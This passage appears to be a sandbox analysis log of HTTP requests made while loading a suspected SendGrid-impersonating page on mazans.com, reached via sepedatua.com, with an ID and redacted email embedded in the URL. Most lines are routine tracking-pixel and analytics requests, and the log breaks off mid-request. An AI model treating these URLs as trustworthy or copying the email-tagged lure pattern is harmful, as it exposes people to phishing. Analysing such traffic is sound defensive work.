    Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /aquant.js?a=p-de_F6qVUp9bug HTTP/1.1Host: secure.quantserve.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ads/conversions-config/v1/pixel/config/t2_i1au5p4_telemetry HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /pixels/t2_i1au5p4/config HTTP/1.1Host: pixel-config.reddit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /x/45414/httpsmazanscomWEBID6672849687924zerobotemailEMAIL_REDACTED.json HTTP/1.1Host: jscloud.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /analytics-next/bundles/ajs-destination.bundle.ed53a26b6edc80c65d73.js HTTP/1.1Host: cdn.segment.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /uxa/8bbf67c487693.js HTTP/1.1Host: t.contentsquare.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /signals/config/731950963606637?v=2.9.176&r=stable&domain=mazans.com&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules-p-de_F6qVUp9bug.js HTTP/1.1Host: rules.quantcount.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rp.gif?ts=1731515353679&id=t2_i1au5p4&event=PageVisit&m.itemCount=&m.value=&m.valueDecimal=&m.currency=&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=59612d52-27d8-4d62-91ae-7a523b33ca67&aaid=&em=&external_id=&idfa=&integration=reddit&opt_out=0&sh=1280&sw=1024&v=rdt_49267bce&dpm=&dpcc=&dprc= HTTP/1.1Host: alb.reddit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/anchor?ar=1&k=6Lc3fVoiAAAAAPwG5oAIHRlqs43SHIxX8Zi1CpOs&co=aHR0cHM6Ly9tYXphbnMuY29tOjQ0Mw..&hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&size=invisible&cb=ef4fwz83bs9w HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlaHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /analytics-next/bundles/schemaFilter.bundle.5c2661f67b4b71a6d9bd.js HTTP/1.1Host: cdn.segment.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /p/action/5202129.js HTTP/1.1Host: bat.bing.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /asset/twilio2.png HTTP/1.1Host: consent.trustarc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bannermsg?action=views&domain=sendgrid.com&behavior=implied&country=us&language=en&rand=0.21308546817366736&session=57cd44ce-3945-49f8-b363-1f9e5ecbe175&userType=NEW&referer=https://mazans.com HTTP/1.1Host: consent.trustarc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /tag/uet/5202129 HTTP/1.1Host: www.clarity.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ct?id=72967&url=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&sf=0&tpi=&ch=SendGrid&uvid=&tsf=0&tsfmi=&tsfu=&cb=1731515352667&hl=1&op=0&ag=300509663&rand=53607585128791107956101156266160898169065292290902265118522000152187107289761818102920&fs=1280x907&fst=1280x907&np=win32&nv=google%20inc.&ref=https%3A%2F%2Fsepedatua.com%2F&ss=1280x1024&nc=0&at=&di=W1siZWYiLDM4ODhdLFsiYWJuY2giLDE3XSxbLTI0LCJbXSJdLFstMjgsImVuLVVTLGVuIl0sWy0zNCwiLSJdLFstNDYsIjAiXSxbLTQ4LCIwLDAiXSxbMTIsIntcImN0eFwiOlwid2ViZ2xcIixcInZcIjpcImdvb2dsZSBpbmMuIChnb29nbGUpXCIsXCJyXCI6XCJhbmdsZSAoZ29vZ2xlLCB2dWxrYW4gMS4zLjAgKHN3aWZ0c2hhZGVyIGRldmljZSAoc3ViemVybykgKDB4MDAwMGMwZGUpKSwgc3dpZnRzaGFkZXIgZHJpdmVyKVwiLFwic2x2XCI6XCJ3ZWJnbCBnbHNsIGVzIDEuMCAob3BlbmdsIGVzIGdsc2wgZXMgMS4wIGNocm9taXVtKVwiLFwiZ3ZlclwiOlwid2ViZ2wgMS4wIChvcGVuZ2wgZXMgMi4wIGNocm9taXVtKVwiLFwiZ3ZlblwiOlwid2Via2l0XCIsXCJiZW5cIjo3LFwid2dsXCI6MSxcImdyZW5cIjpcIndlYmtpdCB3ZWJnbFwiLFwic2VmXCI6MzY5ODUxODcxMCxcInNlY1wiOlwiXCJ9Il0sWy00LCItIl0sWy0zNSwiWzE3MzE1MTUzNTI0MDksNV0iXSxbLTQzLCIwMDAwMDAwMTAxMDAwMDAxMTAxMTEwMTEwMTEwMTEwMTAwMDAwMTAiXSxbLTUzLCIxMDAiXSxbLTU4LCItIl0sWy05LCIrIl0sWy0xOSwiWzAsMCwwLDAsMCwwLDEsMjQsMjQsXCItXCIsMTI4MCw5ODQsMTI4MCwxMDI0LDEyODAsOTg0LDEyODAsOTA3LDAsMCwwLDAsXCItXCIsXCItXCIsMTI2Myw5MDddIl0sWy0yNSwiLSJdLFstNTUsIjEiXSxbLTYwLDIwMV0sWy02MSwie1wid2dzbFwiOlwiMDtcIixcInBjZlwiOlwiYmdyYTh1bm9ybVwifSJdLFstNjYsImdlb2xvY2F0aW9uLHN0b3JhZ2VhY2Nlc3MsZ2FtZXBhZCxjaGVjdCxtaWRpLGRpc3BsYXljYXB0dXJlLHVzYixicm93c2luZ3RvcGljcyxsb2NhbGZvbnRzLHBpY3R1cmVpbnBpY3R1cmUsam9pbmFkaW50ZXJlc3Rncm91cCxwdWJsaWNrZXljcmVkZW50aWFsc2dldCxvdHBjcmVkZW50aWFscyxjaHVhZm9ybWZhY3RvcixlbmNyeXB0ZWRtZWRpYSxjaHNhdmVkYXRhLGNodWFmdWxsdmVyc2lvbmxpc3QsY2h1YXdvdzY0LHNoYXJlZHN0b3JhZ2UsY2hkb3dubGluayxjaHByZWZlcnNjb2xvcnNjaGVtZSxzeW5jeGhyLGNodWFtb2RlbCxzZXJpYWwsY2FtZXJhLGNocHJlZmVyc3JlZHVjZWRtb3Rpb24scHJpdmF0ZXN0YXRldG9rZW5pc3N1YW5jZSxibHVldG9vdGgsaWRlbnRpdHljcmVkZW50aWFsc2dldCxjaHVhZnVsbHZlcnNpb24sZnVsbHNjcmVlbixjaGRwcix1bmxvYWQsa2V5Ym9hcmRtYXAsY2h1YXBsYXRmb3JtLHNoYXJlZHN0b3JhZ2VzZWxlY3R1cmwsZ3lyb3Njb3BlLGludGVyZXN0Y29ob3J0LHdpbmRvd3BsYWNlbWVudCxjaHVhbW9iaWxlLGNodWEscnVuYWRhdWN0aW9uLG1hZ25ldG9tZXRlcixhY2NlbGVyb21ldGVyLHByaXZhdGVzdGF0ZXRva2VucmVkZW1wdGlvbixjaHVhYXJjaCx4cnNwYXRpYWx0cmFja2luZyxpZGxlZGV0ZWN0aW9uLGNodWFwbGF0Zm9ybXZlcnNpb24sY2h3aWR0aCxjbGlwYm9hcmRyZWFkLGNodmlld3BvcnR3aWR0aCxwYXltZW50LGNodmlld3BvcnRoZWlnaHQsY2hydHQsYXV0b3BsYXksY3Jvc3NvcmlnaW5pc29sYXRlZCxoaWQsY2h1YWJpdG5lc3Msc2NyZWVud2FrZWxvY2sscHJpdmF0ZWFnZ3JlZ2F0aW9uLGNsaXBib2FyZHdyaXRlLGF0dHJpYnV0aW9ucmVwb3J0aW5nLGNoZGV2aWNlbWVtb3J5LG1pY3JvcGhvbmUiXSxbLTcxLCJhMDEwMDEwMTEwMDEwMDEwMTAwMDEwMTAwMTExMTEwMDAwMDAxMCJdLFstMywiW1wiaW50ZXJuYWwtcGRmLXZpZXdlclwiLFwiaW50ZXJuYWwtcGRmLXZpZXdlclwiLFwiaW50ZXJuYWwtcGRmLXZpZXdlclwiLFwiaW50ZXJuYWwtcGRmLXZpZXdlclwiLFwiaW50ZXJuYWwtcGRmLXZpZXdlclwiXSJdLFstMzksIltcIjIwMDMwMTA3XCIsMixcIkdlY2tvXCIsXCJOZXRzY2FwZVwiLFwiTW96aWxsYVwiLG51bGwsbnVsbCx0cnVlLDgsZmFsc2UsbnVsbCw1LHRydWUsdHJ1ZSxudWxsLDAsdHJ1ZSx0cnVlXSJdLFstNjMsIi0iXSxbLTcwLCItIl0
    Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/923239173/?random=1731515353497&cv=11&fst=1731515353497&bg=ffffff&guid=ON&async=1&gtm=45be4b70v875390547z89126943770za201zb9126943770&gcd=13t3t3t3t5l1&dma=0&tag_exp=101823848~101925629~102067554~102077854&u_w=1280&u_h=1024&url=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&ref=https%3A%2F%2Fsepedatua.com%2F&hn=www.googleadservices.com&frm=0&tiba=Page%20not%20found%20%7C%20SendGrid&did=dNTIxZG&gdid=dNTIxZG&npa=0&pscdl=noapi&auid=1581689275.1731515350&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlaHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /action/0?ti=5202129&Ver=2&mid=23341f73-a829-452a-8715-848086e91659&bo=1&sid=6c20c730a1dc11ef92b555071f46574f&vid=6c2123d0a1dc11ef9ad55fff4e91da09&vids=1&msclkid=N&uach=pv%3D10.0.0&pi=918639831&lg=en-US&sw=1280&sh=1024&sc=24&tl=Page%20not%20found%20%7C%20SendGrid&p=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&r=https%3A%2F%2Fsepedatua.com%2F&lt=6000&evt=pageLoad&sv=1&cdb=ARoR&rn=686857 HTTP/1.1Host: bat.bing.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /analytics-next/bundles/schemaFilter.bundle.5c2661f67b4b71a6d9bd.js HTTP/1.1Host: cdn.segment.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /tag/uet/5202129 HTTP/1.1Host: www.clarity.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CLID=578bbac004b6466f83ade27540643b49.20241113.20251113
    Source: global trafficHTTP traffic detected: GET /s/0.7.49/clarity.js HTTP/1.1Host: www.clarity.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CLID=578bbac004b6466f83ade27540643b49.20241113.20251113
    Source: global trafficHTTP traffic detected: GET /signals/config/731950963606637?v=2.9.176&r=stable&domain=mazans.com&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /tr/?id=731950963606637&ev=PageView&dl=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&rl=https%3A%2F%2Fsepedatua.com%2F&if=false&ts=1731515356384&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.1.1731515356382.644741780521606255&ler=other&cdl=API_unavailable&it=1731515354065&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /signals/config/1040773425961662?v=2.9.176&r=stable&domain=mazans.com&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C201%2C200%2C202%2C207%2C208%2C209%2C205%2C197%2C132%2C163%2C196%2C198%2C122%2C157%2C145%2C151%2C129%2C233%2C116%2C127%2C234%2C165%2C119%2C236%2C166%2C136%2C123%2C154%2C148%2C193%2C114%2C128 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /uxa/8bbf67c487693.js HTTP/1.1Host: t.contentsquare.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules-p-de_F6qVUp9bug.js HTTP/1.1Host: rules.quantcount.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=731950963606637&ev=PageView&dl=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&rl=https%3A%2F%2Fsepedatua.com%2F&if=false&ts=1731515356384&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.1.1731515356382.644741780521606255&ler=other&cdl=API_unavailable&it=1731515354065&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: not-navigation-source, trigger, event-sourceReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /mon HTTP/1.1Host: obseu.powerrobotflower.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=a7672655cc19ce211243958c37046200
    Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/923239173/?random=1731515353497&cv=11&fst=1731515353497&bg=ffffff&guid=ON&async=1&gtm=45be4b70v875390547z89126943770za201zb9126943770&gcd=13t3t3t3t5l1&dma=0&tag_exp=101823848~101925629~102067554~102077854&u_w=1280&u_h=1024&url=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&ref=https%3A%2F%2Fsepedatua.com%2F&hn=www.googleadservices.com&frm=0&tiba=Page%20not%20found%20%7C%20SendGrid&did=dNTIxZG&gdid=dNTIxZG&npa=0&pscdl=noapi&auid=1581689275.1731515350&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 